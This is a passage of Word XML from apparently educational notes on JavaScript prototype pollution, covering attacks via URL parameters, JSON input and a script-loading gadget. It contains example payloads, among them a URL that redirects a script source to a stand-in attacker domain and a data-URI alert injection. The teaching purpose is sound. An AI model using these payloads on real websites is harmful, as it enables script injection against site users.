          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:anchor="prototype-pollution-via-the-url" w:history="1">
        <w:r w:rsidRPr="000477D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>URL</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> via either the query or fragment string (hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D92B0B" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00621E60" w:rsidP="00430A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2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:anchor="prototype-pollution-via-json-input" w:history="1">
        <w:r w:rsidR="00430AD9" w:rsidRPr="000477D2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>JSON-based input</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37552534" w14:textId="0D2828F1" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430A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2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Web messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B75F3F" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430A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2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D8FB29" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Prototype pollution via the URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A66AE33" w14:textId="7FA9B65A" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="005244C7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider: </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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https://vulnerable-website.com/?__proto__[evilProperty]=payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751C256D" w14:textId="5079F413" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>__proto__</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> property, along with its nested </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>evilProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, will just be added to the target object as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3263E598" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6BD488" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9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existingProperty1: 'foo',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC536DA" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9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existingProperty2: 'bar',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D6340B" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9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__proto__: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089764BD" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9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    evilProperty: 'payload'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330058DD" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2097295E" w14:textId="2F5DE496" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349BA272" w14:textId="51B3B70B" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768213B5" w14:textId="2F4DF565" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>At some point, the recursive merge operation may assign the value of </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>evilProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0DD0C0" w14:textId="199A4077" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2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targetObject.__proto__.evilProperty = 'payload</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000477D2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';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="77453390" w14:textId="34D8245B" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05244700" w14:textId="3ECFDE3F" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>As a result, </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>evilProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> is assigned to the returned prototype object rather than the target object itself.</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>If the target object uses the default </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>Object.prototype</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, all objects in the JavaScript runtime will now inherit </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>evilProperty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0C8A" w14:textId="0D0959C2" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00424793">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker can use the same technique to pollute the prototype with properties that are used by the application, or any imported libraries (not </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>evilProperty).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC514A9" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD5F448" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Prototype pollution via JSON input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A80B2C6" w14:textId="1C743D6A" w:rsidR="00C83D69" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00430AD9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0477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Let's say an attacker injects the following malicious JSON:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C4F15" w14:textId="7F39766A" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4952B58A" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9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"__proto__": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B51F8" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9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    "evilProperty": "payload"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E543A9D" w14:textId="77777777" w:rsidR="00430AD9" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A76A050" w14:textId="20595042" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00430AD9" w:rsidP="00430AD9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215629E6" w14:textId="01921D12" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C86471C" w14:textId="77777777" w:rsidR="00C83D69" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00C83D69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const objectLiteral = {__proto__: {evilProperty: 'payload'}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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};</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6662B72A" w14:textId="77777777" w:rsidR="00C83D69" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00C83D69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const objectFromJson = JSON.parse('{"__proto__": {"evilProperty": "payload"}}'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7419B6B9" w14:textId="77777777" w:rsidR="00C83D69" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00C83D69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</w:p>
    <w:p w14:paraId="1983C9B3" w14:textId="77777777" w:rsidR="00C83D69" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00C83D69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objectLiteral.hasOwnProperty('__proto__');     </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D71FE13" w14:textId="6FDDA07B" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00C83D69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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objectFromJson.hasOwnProperty('__proto__');    </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="999998"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>// true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F045A80" w14:textId="7510CBB8" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557B9840" w14:textId="77777777" w:rsidR="00C83D69" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00C83D69">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Example of a prototype pollution gadget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20644F47" w14:textId="32F939D1" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Many JavaScript libraries accept an object that developers can use to set different configuration options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F84615" w14:textId="1D936E2B" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2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let transport_url = config.transport_url || defaults.transport_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000477D2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url;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68179E3F" w14:textId="5A0DB99D" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The library code uses this </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>transport_url</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> to add a script reference to the page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69226C48" w14:textId="77777777" w:rsidR="00C83D69" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00C83D69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let script = document.createElement('script'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68A0F68C" w14:textId="77777777" w:rsidR="00C83D69" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00C83D69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script.src = `${transport_url}/example.js</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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`;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F518B84" w14:textId="021F4463" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00C83D69">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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document.body.appendChild(script</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D406109" w14:textId="29D79653" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C3716E" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EAEB1F6" w14:textId="5D9FEA5B" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C83D69" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>If the website's developers haven't set a </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>transport_url</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> property on their </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>config</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> object and the attacker pollute</w:t>
      </w:r>
      <w:r w:rsidR="00C0337A" w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00C0337A" w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>global </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>Object.prototype</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> with their own </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>transport_url</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> property, this will be inherited by the </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>config</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> object and, therefore, set as the </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>src</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> for this script to </w:t>
      </w:r>
      <w:r w:rsidR="00C0337A" w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">the attack’s </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>domai</w:t>
      </w:r>
      <w:r w:rsidR="00C0337A" w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>n.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A7D73" w14:textId="0B379292" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2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https://vulnerable-website.com/?__proto__[transport_url]=//evil-user.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61857094" w14:textId="4FB59161" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2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https://vulnerable-website.com/?__proto__[transport_url]=data:,alert(1);//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528442A4" w14:textId="691C9C3C" w:rsidR="00C3716E" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The trailing </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>//</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> is to comment out the hardcoded </w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2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>/example.js</w:t>
      </w:r>
      <w:r w:rsidRPr="000477D2">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> suffix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A29001" w14:textId="77777777" w:rsidR="00C0337A" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00424793">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C8F1B72" w14:textId="77777777" w:rsidR="00C0337A" w:rsidRPr="000477D2" w:rsidRDefault="00C0337A" w:rsidP="00C0337A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
